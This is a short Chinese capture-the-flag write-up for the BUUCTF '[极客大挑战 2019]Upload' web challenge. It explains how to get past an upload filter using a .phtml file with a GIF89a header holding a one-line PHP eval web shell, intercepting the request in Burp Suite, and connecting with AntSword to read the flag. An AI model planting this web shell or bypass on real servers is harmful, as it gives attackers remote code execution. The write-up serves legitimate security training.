Buuctf-web-[极客大挑战 2019]Upload

 

 发现让我们上传文件,

首先在桌面创建一个y.phtml的文件,内容为

GIF89a
<script language="php">eval($_POST['shell']);</script> 

然后我们将它上传,提交时使用bp截取,修改一下格式,再放行

 

 

 

 我们使用蚁剑连接,猜测路径为upload

完整路径:http://0f254660-9a2c-4eee-9b1c-44afd44fa7d5.node3.buuoj.cn/upload/y.phtml

密码就是y.phtml里的shell

 

 然后测试连接,添加

 

 flag在根目录

 

posted @ 2020-10-15 00:07  夜布多  阅读(538)  评论(0编辑  收藏  举报